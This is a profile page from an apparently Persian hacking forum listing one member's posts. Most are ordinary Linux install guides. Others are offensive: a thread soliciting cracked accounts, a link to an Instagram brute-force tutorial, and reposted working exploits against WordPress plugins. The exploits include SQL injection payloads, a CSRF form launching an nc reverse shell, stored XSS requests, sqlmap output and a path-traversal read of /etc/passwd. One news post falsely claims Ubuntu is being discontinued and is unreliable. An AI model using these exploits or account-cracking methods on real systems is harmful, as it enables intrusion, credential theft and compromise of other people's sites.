رفتن به مطلب



iran rules jazbe modir
ADS mahak

owl

 عضو فعال
  • تعداد ارسال ها

    186
  • امتیاز

    1,143 
  • تاریخ عضویت

  • آخرین بازدید

  • روز های برد

    11

تمامی مطالب نوشته شده توسط owl

  1. با سلام به دوستان در اکانت هایی که کرک کرده اید را به این تایپیک ارسال کنید . قوانین 1- اسپم ممنوع 2-سوال ممنوع با تشکر مورد تکمیلی اضافه شده توسط مدیریت تیم: ارسال هر اکانتی از سایت یا نرم افزار ایرانی اکیدا ممنوع بوده و در صورت گزارش و رویت مورد فوق شخص خاطی از انجمن بن خواهد شد. (به دستور کارگروه تعیین مصادیق محتوای مجرمانه)
  2. با سلام بنده درخواستی داشتم در باره اضافه شدن بخش unix به بخش سیستم عامل ها چون این سیستم عامل هم یک سیستم عامل خیلی مهمی است که بنظرم باید همه اموزش های درباره این سیستم عامل را هم یاد بگیرند درست با لینوکس شباهت های زیادی دارد ولی بعضی چیزهای متفاوتی دارد لطفا بخش را اضافه کنید با تشکر از تمامی مدیران انونیسک 🙏
  3. اهان مغذرت حواسم نبود
  4. owl

    Linux

    با سلام با اموزش نصب استیم بر روی لینوکس arch هستیم خب استیم یک شرکت فروش گیم است که گیمر ها ازش گیم را دانلود و به صورت ارجینال پلی میدهند اگر شما هم گیمر هستیم میتوانید از این اموزش استفاده کنید ابتدا ترمینال را باز کرده و دستور زیرا تایپ کنید : sudo pacman -Sy wine با دستور بالا wine نصب خواهد شد تا شما فایل های exe را اجرا کنید حالا با دستور زیر اقدام نصب استیم نمایید : pacman -Sy steam امید وارم خوشتان امده باشد با تشکر سوالی بود در بخش faq مطرح نمایید .
  5. owl

    Linux

    استیم یک شرکت فروش بازی های رایانه ایست و با برنامه استیم گیمر ها میتوانند بازی هارا به صورت اورجینال دانلود و نصب کنند خب در این اموزش میخوام یاد بدم که چگونه استیم را بر روی لینوکس دبیان نصب کنید : ابتدا ترمینال را باز کرده و دستور زیرا تایپ کنید : sudo apt-get install wine با نصب wine شما قادر به اجرای فایل های exe هستید و با دستور زیر استیم را نصب کنید : sudo apt-get install steam هم استیم نصب خواهد شد الان بازی مدنظر را دانلود کرده و بازی کنید . باتشکر
  6. owl

    Linux

    با سلام با اموزش نصب vscode بر روی debian ابزار vscode یک idle زیبا برای برنامه نویسان است این ابزار به صورت رایگان برای ویندوز - لینوکس - مک عرضه شده است دراین اموزش میخوام اموزش نصب کردن vscode بر روی دبیان رو برای شما دوستان انونیسک اموزش دهم . ابتدا به لینک زیر رفته و فایل را دانلود کنید : https://go.microsoft.com/fwlink/?LinkID=760868 حالا بعد از دانلود کردن فایل را به دسکتا‍‍پ پیست کنید و ترمینال را اجرا کنید : ابتدا دستور زیر را بنویسید تا به دایرکتوری دسکتاپ برود : cd Desktop حالا با تای‍پ کردن دستور زیر فایل vscode نصب خواهد شد : sudo dpkg -i vscode.deb و بعد از ان vscode نصب خواهد شد و ایکونش در دسکتاپ نمایش خواهد شد . امید وارم خوشتان امده باشد موفق و سربلند باشید سوالی بود در قسمت faq مطرح فرمایید با تشکر .
  7. با سلام به دوستان عزیز anonysec با اموزش نصب کردن میزکار gnome بر روی arch linux با شما هستم . اگر سیستم عامل شما محیط کامندی هست و گرافیکی نیست مستقیما دستور زیر را بنویسید نه اگر محیط گرافیکی دارد ترمینال را باز کنید :‌ sudo pacman -S gnome با دستور بالا gnome نصب خواهد شد اگر محیط گرافیکی استفاده میکنید هنگام ظاهر شدن صفحه لاگین لینوکستون از قسمت میزکار ها میزکار gnome را انتخواب کرده و به ان وارد شوید . باتشکر موفق و سربند باشید
  8. با سلام از اطلاع رسانی شما ممنونم ولی بنده به قسمت انتقادات و پیشنهادات ارسال کردن
  9. owl

    Miscellaneous

    باسلام با اموزش نصب میزکار gnome بر روی یونیکس با شما هستیم . در یونیکس کامندی خود تایپ کنید :‌ pkg install gnome3 بعد از تایپ کردن دستور بالا میزکار gnome نصب خواهد شد و با دستور reboot یونیکس خود را ریستارت کرده و از یونیکس با محیط گرافیکی خود لذت ببرید . باتشکر امیدوارم خوشتان امده باشد
  10. روز ‍ پیش شرکت سازنده اوبونتو به کاربران خود هشدار داد که دیگر توزیع لینوکسشان به اخرین عمرش رسیده است و دیکر اپدیتی به لینوکس خودشان نخواهند داد انها اشاره کردند که اخرین ورژن این توزیع ورژن LTS 14.04 خواهد بود و دیگر هیچ اپدیت ثانویه و امنیتی عرضه نخواهد کرد و به ادمین های سایت ها هم هشدار داد تا اکر سایتشان اختلال امنیتی به وجود امد دیگر با اپدیت کردن اوبونتوشان هیچ تاثیری نخواد داشت ! اینطور به نظر میرسد که به زودی هم این شرکت دیگر از لینوکس خود ‍پشتیبانی نخواهند کرد ! و اخرین اپدیت این لینوکس در فروردین ۹۸ عرضه خواهد شد .
  11. با سلام با اموزش نصب میزکار kde plasma بر روی ارچ لینوکس با شما هستیم . خب اگر روی ارچ لینوکستون میزکاری نیست و کامندی است میتونید تو خود اون بزنید و نه میزکاری دارد میتونید در ترمینال خود تایپ کنید ! ابتدا دستور زیر را وارد کنید :‌ sudo pacman -S plasma هنگامی که این دستوری را زدید ازتون میخواد گذینه ای را انتخواب کنید شما به صورت پیشفرض گذینه ۱ را وارد کنید تا شروع به نصب کردن میزکار شود بعد از این که نصب شد سیستم خود را با دستور reboot ریستارت کرده و از میزکار خود لذت ببرید . به نظر من این میزکار برای کاربران تازه وارد که از ویندوز به لینوکس کوچ کرده اند بهتر است !
  12. با سلام به گاربران گرامی انونیسک با اموزش نصب میزکار بر روی ارچ لینوکس با شما هسنیم , شما وقتی ارچ لینوکس را نصب کردید هیچ میزکار در اختیارتان نیست میتوانید از طریق دستورات زیر اقدام نصب میزکار نمایید و از ان استفاده کنید , در این اموزش میزکار xfce نصب خواهیم کرد و در اموزش های بعدی میزکار های دیگری هم اموزش خواهیم داد . ابتدا دستور زیرا در ارچ لینوکس خود که حالت دستوری دارد بنویسید و یا اگر حالت گرافیکی هم داشت از ترمینال استفاده کنید :‌ sudo pacman -S xfce4 خب حالا برایتان به صورت اتوماتیک میزکار نصب خواهد شد بعد از نصب شدن با دستور زیر فایل های موردنیاز میزکار را هم نصب کنید :‌ sudo pacman -S xfce4-goodies خب بعد از این کار میزکار نصب خواهد شد شما با دستور reboot سیستم خود را ریستارت کنید و با میزکار خود کیف کنید با امید موفقیت با اشکالی بود در قسمت faq بفرمایید بنده تا جایی که از دستم بربیاد جواب سوالاتونو میدم .
  13. owl

    Linux

    با سلام با اموزش نصب کانکی بر روی دبیان با شما هستیم . خب ابتدا ترمینال خود را باز کنید دستور زیر را تایپ کنید :‌ sudo apt-get install conky && sudo apt-get install conky-manager با دستور بالا هم کانکی منیجر و هم کانکی نصب خواهد شد ! اگر میخواهید کانکی رو بر روی ارچ نصب کنید مطلب قبلی رو نگاه کنید باتشکر . سوالی بود در قسمت faq مطرح نمایید با تشکر .
  14. owl

    Linux

    با سلام با اموزش نصب کانکی بر روی لینوکس ارچ با شما هستیم . شاید برایتان سوال باشد که کانکی چه چیزی است ؟‌ کانکی افزونه ای است که مثل ویندوز به صفحه ویندوز ساعت و یا نشان دهنده گرمای سیپیو اضافه میکردیم همین کار در لینوکس هم میشود ابتدا ترمینال را در ارچ لینوکس بازکنید و بنویسید . pacman -Sy conky ابتدا گانکی رو نصب کنید و با دستور زیر گانکی منیجر رو هم نصب کنید pacman -Sy conky-manager بعد الان کانکی منیجر هم نصب شد با دستور conky-manger میتوانید کانکی منیجر رو باز کرده و کانکی هایی که نصب شده رو اضافه کنید . اگر کانکی خواصی دانلود کردید از قسمت روت لینوکستیون تنظیم کنید فایل های hide رو نشون بده و به قسمت .font فونت های کانکی خودتون رو و به .conky فایل کانکی خود را اضافه کنید . موفق و سر بلند باشید .
  15. با سلام میخوام در این بخش هم براتون میز کار Pantheon معرفی کنم خب این میزکار تقریبا میشه گفت محیطش شبیه مک هست و بنظرم خیلی زیباست و سرعتش زیاده خب میخوام به اموزش نصب این میزکار باهم بپردازیم . ابتدا مثل همیشه ترمینال را باز کنید و دستور زیرا تایپ کنید : sudo add-apt-repository ppa:elementary-os/daily با تایپ دستور بالا repository میزکار به لیست repository شما اضافه خواهد شد بعد با دستور زیر اوبونتو خود را اپدیت کنید sudo apt-get update و الان با دستور زیر اقدام نصب میزکار کنید : sudo apt install elementary-desktop خب حجم این میزکار که قبلا من دانلود کرده بودم دوره بر یک گیگ بود بعد از دانلود و نصب شدن با دستور زیر باید فایل هایی که از UI ساپورت نمیکنند رو حذف کنیم برای این کار دستور زیر میزنیم : sudo apt purge gnome-screensaver \ switchboard-plug-power switchboard-plug-bluetooth switchboard-plug-networking \ wingpanel-indicator-bluetooth wingpanel-indicator-network بعد از این که اینکار را انجام دادید با دستور زیر اقدام به اجرای میزکار نمایید . export DISPLAY=127.0.0.1:0.0; gala --x11& plank& wingpanel& با تشکر .
  16. بعضی وقتا در بعضی از لیوکس های برپایه debian مشکلاتی داردن هم چو نداشتن صدا بعد از لاگین کردن خب چنتا از دوستان قبلا هم همین مشکل رو داشتن برای حل این مشکل ترمینال را باز کنید و دستور زیر بزنید : systemctl --user enable pulseaudio && systemctl --user start pulseaudio در واقع درایو pulsaudio اکتیو نیست ما اکتیو میکنیم و با دستور start pulseaudio هم درایو رو استارت میکنیم اگر باز مشکل شما حل نشد از دستور زیر هم استفاده کنید : sudo apt-get install libasound2 خب با دستور بالا درایو libasound2 را نصب میکنیم اگر باز مشکلی داشتید در بخش faq مطرح کنید امید وارم مشکلات شما رو حل کرده باشم با تشکر .
  17. باسلام با اموزش حمله بورت فورس به اکانت های اینستاگرام با شما هستیم این اموزش به صورت ویدیویی توسط بنده ریکورد شده است اگر مشکلی داشتید در بخش faq مطرح نمایید باتشکر لینک اموزش: http://s8.picofile.com/file/8348734842/anonysec_instagramcracking_in_kali_linux_mp4.zip.html رمز : anonysec مشکلی داشتید در خدمتم .
  18. # Exploit Title: Wordpress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection # Date: 2018-09-09 # Exploit Author: Ceylan Bozogullarindan # Vendor Homepage: http://modalsurvey.pantherius.com/ # Software Link: https://downloads.wordpress.org/plugin/wp-survey-and-poll.zip # Version: 1.5.7.3 # Tested on: Windows 10 # CVE: N\A # Description # The vulnerability allows an attacker to inject sql commands using a value of a cookie parameter. # PoC # Step 1. When you visit a page which has a poll or survey, a question will be appeared for answering. # Answer that question. # Step 2. When you answer the question, wp_sap will be assigned to a value. Open a cookie manager, # and change it with the payload showed below; ["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@version,11#"] # It is important that the "OR" statement must be 1=2. Because, application is reflecting the first result # of the query. When you make it 1=1, you should see a question from firt record. # Therefore OR statement must be returned False. # Step 3. Reload the page. Open the source code of the page. Search "sss_params". # You will see the version of DB in value of sss_params parameter. # The Request Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: wp_sap=["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@version,11#"] Connection: keep-alive Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 # The result from source code of the page <script type='text/javascript'> /* <![CDATA[ */ var sss_params = {"survey_options":"{\"options\":\"[\\\"center\\\",\\\"easeInOutBack\\\",\\\"\\\",\\\"-webkit-linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);-moz-linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);-ms-linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);-o-linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);\\\",\\\"rgb(0, 0, 0)\\\",\\\"rgb(93, 93, 93)\\\",\\\"1\\\",\\\"5\\\",\\\"12\\\",\\\"10\\\",\\\"12\\\",500,\\\"Thank you for your feedback!\\\",\\\"0\\\",\\\"0\\\",\\\"0\\\"]\",\"plugin_url\":\"http:\\\/\\\/www.*****.com\\\/wp-content\\\/plugins\\\/wp-survey-and-poll\",\"admin_url\":\"http:\\\/\\\/www.******.com\\\/wp-admin\\\/admin-ajax.php\",\"survey_id\":\"1101225978\",\"style\":\"modal\",\"expired\":\"false\",\"debug\":\"true\",\"questions\":[[\"Are You A First Time Home Buyer?\",\"Yes\",\"No\"],[\>>>>>>"10.1.36-MariaDB-1~trusty\"<<<<<<<]]}"}; /* ]]> */ </script> DB version: "10.1.36-MariaDB-1~trusty"....
  19. <!-- About: =========== Component: Plainview Activity Monitor (Wordpress plugin) Vulnerable version: 20161228 and possibly prior Fixed version: 20180826 CVE-ID: CVE-2018-15877 CWE-ID: CWE-78 Author: - LydA(c)ric Lefebvre (https://www.linkedin.com/in/lydericlefebvre) Timeline: =========== - 2018/08/25: Vulnerability found - 2018/08/25: CVE-ID request - 2018/08/26: Reported to developer - 2018/08/26: Fixed version - 2018/08/26: Advisory published on GitHub - 2018/08/26: Advisory sent to bugtraq mailing list Description: =========== Plainview Activity Monitor Wordpress plugin is vulnerable to OS command injection which allows an attacker to remotely execute commands on underlying system. Application passes unsafe user supplied data to ip parameter into activities_overview.php. Privileges are required in order to exploit this vulnerability, but this plugin version is also vulnerable to CSRF attack and Reflected XSS. Combined, these three vulnerabilities can lead to Remote Command Execution just with an admin click on a malicious link. References: =========== https://github.com/aas-n/CVE/blob/master/CVE-2018-15877/ PoC: --> <html> <!-- Wordpress Plainview Activity Monitor RCE [+] Version: 20161228 and possibly prior [+] Description: Combine OS Commanding and CSRF to get reverse shell [+] Author: LydA(c)ric LEFEBVRE [+] CVE-ID: CVE-2018-15877 [+] Usage: Replace 127.0.0.1 & 9999 with you ip and port to get reverse shell [+] Note: Many reflected XSS exists on this plugin and can be combine with this exploit as well --> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost:8000/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools" method="POST" enctype="multipart/form-data"> <input type="hidden" name="ip" value="google.fr| nc -nlvp 127.0.0.1 9999 -e /bin/bash" /> <input type="hidden" name="lookup" value="Lookup" /> <input type="submit" value="Submit request" /> </form> </body> </html>
  20. # Exploit Title: WordPress Plugin Jibu Pro 1.7 - Cross-Site Scripting # Google Dork: inurl:"/wp-content/plugins/jibu-pro" # Date: 2018-08-29 # Exploit Author: Renos Nikolaou # Software Link: https://downloads.wordpress.org/plugin/jibu-pro.1.7.zip # Version: 1.7 # Tested on: Kali Linux # CVE: N/A # Description: Jinu Pro is prone to Stored Cross Site Scripting vulnerabilities # because it fails to properly sanitize user-supplied input. # PoC - Stored XSS - Parameter: name # 1) Login as a user who have access to Jibu Pro plugin. # 2) Jibu-Pro --> Create Quiz. # 3) At the Quiz Name type: poc"><script>alert(1)</script> , then fill the remaining fields and click Save. # (The first pop-up will appear. Also keep note of the shortcode, similar to: [Test Number]) # 4) Click Create New Questions, fill the fields and click Save. # 5) Copy the Shortcode [Test Number] into any post or page and visit the it via browser. # Post Request (Step 3): POST /wordpress/wp-content/plugins/jibu-pro/quiz_action.php HTTP/1.1 Host: domain.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://domain.com/wordpress/wp-admin/edit.php?page=jibu-pro%2Fquiz_form.php&action=new Cookie: wordpress_295cdc576d46a74a4105db5d33654g45 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 512 name=poc"><script>alert(1)</script>&description=poc&passedMark=3&no_of_ques=3&content=Congrats&_wpnonce=c2414882de&_wp_http_referer=/wordpress/wp-admin/edit.php?page=jibu-pro/quiz_form.php&action=new&action=new&quiz=&user_ID=1&submit=Save
  21. # Exploit Title: WordPress Plugin Quizlord 2.0 - Cross-Site Scripting # Date: 2018-08-29 # Exploit Author: Renos Nikolaou # Software Link: https://downloads.wordpress.org/plugin/quizlord.zip # Version: 2.0 # Tested on: Kali Linux # CVE: N/A # Description : Quizlord is prone to Stored Cross Site Scripting vulnerabilities # because it fails to properly sanitize user-supplied input. # PoC - Stored XSS - Parameter: title # 1) Login as a user who have access to Jibu Pro plugin. # 2) Quizlord --> Add a Quiz. # 3) At the title type: poc"><script>alert(1)</script> , then fill the remaining fields and click Save. # (The first pop-up will appear. Also keep note of the shortcode: [quizlord id="#"]) # 4) Copy the Shortcode [quizlord id="#"] into any post or page and visit the it via browser. # Post Request (Step 3): POST /wordpress/wp-admin/admin.php HTTP/1.1 Host: domain.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://domain.com/wordpress/wp-admin/admin.php?page=quizlord Cookie: wordpress_295cdc576d46a74a4105db5d33654g45 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 188 action=ql_insert&title=poc"><script>alert(1)</script>&description=&time=0&numbtype=numerical&numbmark=&rightcolor=00FF00&wrongcolor=FF0000&showtype=paginated&addquiz=Save
  22. Title: Blind SQL injection and multiple reflected XSS vulnerabilities in Wordpress Plugin Arigato Autoresponder and Newsletter v2.5 Author: Larry W. Cashdollar, @_larry0 Date: 2018-08-22 CVE-IDs:[CVE-2018-1002000][CVE-2018-1002001][CVE-2018-1002002][CVE-2018-1002003][CVE-2018-1002004][CVE-2018-1002005][CVE-2018-1002006][CVE-2018-1002007][CVE-2018-1002008][CVE-2018-1002009] Download Site: https://wordpress.org/plugins/bft-autoresponder/ Vendor: Kiboko Labs https://calendarscripts.info/ Vendor Notified: 2018-08-22, Fixed v2.5.1.5 Vendor Contact: @prasunsen wordpress.org Advisory: http://www.vapidlabs.com/advisory.php?v=203 Description: This plugin allows scheduling of automated autoresponder messages and newsletters, and managing a mailing list. You can add/edit/delete and import/export members. There is also a registration form which can be placed in any website or blog. You can schedule unlimited number of email messages. Messages can be sent on defined number of days after user registration, or on a fixed date. Vulnerability: These vulnerabilities require administrative priveledges to exploit. CVE-2018-1002000 There is an exploitable blind SQL injection vulnerability via the del_ids variable by POST request. In line 69 of file controllers/list.php: 65 $wpdb->query("DELETE FROM ".BFT_USERS." WHERE id IN (".$_POST['del_ids'].")"); del_ids is not sanitized properly. Nine Reflected XSS. CVE-2018-1002001 In line 22-23 of controllers/list.php: 22 $url = "admin.php?page=bft_list&offset=".$_GET['offset']."&ob=".$_GET['ob']; 23 echo "<meta http-equiv='refresh' content='0;url=$url' />"; CVE-2018-1002002 bft_list.html.php:28: <div><label><?php _e('Filter by email', 'broadfast')?>:</label> <input type="text" name="filter_email" value="<?php echo @$_GET['filter_email']?>"></div> CVE-2018-1002003 bft_list.html.php:29: <div><label><?php _e('Filter by name', 'broadfast')?>:</label> <input type="text" name="filter_name" value="<?php echo @$_GET['filter_name']?>"></div> CVE-2018-1002004 bft_list.html.php:42: <input type="text" class="bftDatePicker" name="sdate" id="bftSignupDate" value="<?php echo empty($_GET['sdate']) ? '' : $_GET['sdate']?>"> CVE-2018-1002005 bft_list.html.php:43: <input type="hidden" name="filter_signup_date" value="<?php echo empty($_GET['filter_signup_date']) ? '' : $_GET['filter_signup_date']?>" id="alt_bftSignupDate"></div> CVE-2018-1002006 integration-contact-form.html.php:14: <p><label><?php _e('CSS classes (optional):', 'broadfast')?></label> <input type="text" name="classes" value="<?php echo @$_POST['classes']?>"></p> CVE-2018-1002007 integration-contact-form.html.php:15: <p><label><?php _e('HTML ID (optional):', 'broadfast')?></label> <input type="text" name="html_id" value="<?php echo @$_POST['html_id']?>"></p> CVE-2018-1002008 list-user.html.php:4: <p><a href="admin.php?page=bft_list&ob=<?php echo $_GET['ob']?>&offset=<?php echo $_GET['offset']?>"><?php _e('Back to all subscribers', 'broadfast');?></a></p> CVE-2018-1002009 unsubscribe.html.php:3: <p><input type="text" name="email" value="<?php echo @$_GET['email']?>"></p> Exploit Code: SQL Injection CVE-2018-1002000 $ sqlmap --load-cookies=./cook -r post_data --level 2 --dbms=mysql Where post_data is: POST /wp-admin/admin.php?page=bft_list&ob=email&offset=0 HTTP/1.1 Host: example.com Connection: keep-alive Content-Length: 150 Cache-Control: max-age=0 Origin: http://example.com Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Referer: http://example.com/wp-admin/admin.php?page=bft_list&ob=email&offset=0 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: wordpress_XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX mass_delete=1&del_ids=*&_wpnonce=aa7aa407db&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dbft_list%26ob%3Demail%26offset%3D0[!http] (custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] sqlmap identified the following injection point(s) with a total of 300 HTTP(s) requests: --- Parameter: #1* ((custom) POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 time-based blind - Parameter replace Payload: mass_delete=1&del_ids=(CASE WHEN (6612=6612) THEN SLEEP(5) ELSE 6612 END)&_wpnonce=aa7aa407db&_wp_http_referer=/wp-admin/admin.php?page=bft_list%26ob=email%26offset=0[!http] --- [11:50:08] [INFO] the back-end DBMS is MySQL web server operating system: Linux Debian 8.0 (jessie) web application technology: Apache 2.4.10 back-end DBMS: MySQL >= 5.0.12 [11:50:08] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/192.168.0.47' [*] shutting down at 11:50:08 CVE-2018-1002001 http://example.com/wp-admin/admin.php?page=bft_list&action=edit&id=12&ob=XSS&offset=XSS
  23. # Exploit Title: WordPress Plugin Localize My Post 1.0 - Local File Inclusion # Author: Manuel Garcia Cardenas # Date: 2018-09-19 # Software link: https://es.wordpress.org/plugins/localize-my-post/ # CVE: 2018-16299 # DESCRIPTION # This bug was found in the file: /localize-my-post/ajax/include.php # include($_REQUEST['file']); # The parameter "file" it is not sanitized allowing include local files # To exploit the vulnerability only is needed use the version 1.0 of the HTTP protocol to interact with the application. # Local File Inclusion POC: GET /wordpress/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd
  24. owl

    FAQ-kali Linux

    روی سیستمتون سرویس apache نصبه ؟‌ اگر از لینوکس استفاده میکنید با دستور : s sudo apt-get install apache && apt-get install apache2 اقدام به دانلود و نصب apache بکنید و با دستور : s start service apache2 && start service apache اقدام به راه اندازی apache بکنید و بعد دوباره ابزار beef را اجرا کنید .
×